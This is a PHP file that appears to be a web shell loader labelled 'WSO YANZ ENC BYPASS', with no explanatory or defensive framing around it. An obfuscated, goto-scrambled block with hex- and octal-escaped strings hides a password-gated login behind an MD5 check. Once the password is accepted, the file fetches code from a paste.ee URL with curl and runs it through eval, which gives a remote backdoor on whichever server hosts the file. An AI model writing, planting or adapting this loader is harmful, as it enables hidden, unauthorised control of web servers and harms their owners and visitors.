<?php
session_start();
echo '<!DOCTYPE html>';
echo '<html>';
echo '';
echo '<head>';
echo '<meta charset="utf-8" />';
echo '';
echo '<title>';
echo $_SERVER['HTTP_HOST'].'--'.'WSO YANZ ENC BYPASS';
echo '</title>';
echo '';
echo '<!-- add icon link -->';
echo '<link rel="icon" href=';
echo '"https://raw.githubusercontent.com/xyndicategaming/wpfile/main/logo24cr2.png"';
echo 'type="image/x-icon">';
echo '';
echo '</head>';
echo '';
echo '<body>';
echo '</body>';
echo '';
echo '</html>';
?>
<?php
 goto NLnKLsvYFH; NLnKLsvYFH: $pas = "f10dc89445efc3a3465820925fd1b194"; error_reporting(0); set_time_limit(0); session_start(); if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"])) { goto DqqOhzX5B0; } goto u3NT7x2QrJ; u3NT7x2QrJ: $_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false; DqqOhzX5B0: if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) { goto pb73Ufbn0o; } if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) == $pas)) { goto mr5E2rLws5; } $_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5($_POST["\160\141\x73\163\x77\x6f\x72\x64"]); goto SjaSVtI46I; SjaSVtI46I: mr5E2rLws5: pb73Ufbn0o: if (!(!$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] || $_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] != $pas)) { goto EXNN3Tp2rS; } echo "\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x20\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa"; exit; goto ocC9gxzse4; ocC9gxzse4: EXNN3Tp2rS: ?>
<?php
$url = "https://paste.ee/r/iXIbV";
$ch = curl_init($url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval("?>".$result);

?>